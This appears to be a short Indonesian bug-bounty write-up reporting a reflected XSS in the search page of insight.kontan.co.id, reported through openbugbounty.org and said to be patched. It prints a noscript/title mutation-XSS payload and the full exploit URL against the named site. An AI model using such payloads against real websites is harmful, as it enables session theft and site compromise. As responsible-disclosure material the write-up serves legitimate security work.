Simple RXSS di website insight.kontan.co.id

6 days ago 15
BOOK THIS SPACE FOR AD
ARTICLE AD

kunx90

Assalamualaikum Bug Hunter dan teman-teman semua

Pada write up kali ini, saya mendapatkan sebuah temuan yang simple hanya dengan mempelajari website target keseluruhan

lanjut ke detail temuannya

saya menemukan celah ini di fitur pencarian, dimana saya mendapatkan subdo ini dari website official kontan.co.id

https://insight.kontan.co.id/search?search=

dengan payload

<noscript><p title=”</noscript><img src=x onerror=prompt(document.domain)>”>

full URL

insight.kontan.co.id/search?search=<noscript><p+title%3D”<%2Fnoscript><img+src%3Dx+onerror%3Dalert%28document.domain%29>”>

karena saya tidak mendapatkan kontak tim terkait maka saya laporkan temuan ini ke openbugbounty.org dan tim sudah patch celah ini

kemudian tim berencana memberikan reward sebagai apresiasi

timeline:

Report: 04.11.2024

Valid : 11.11.2024

Reward : in process

Read Entire Article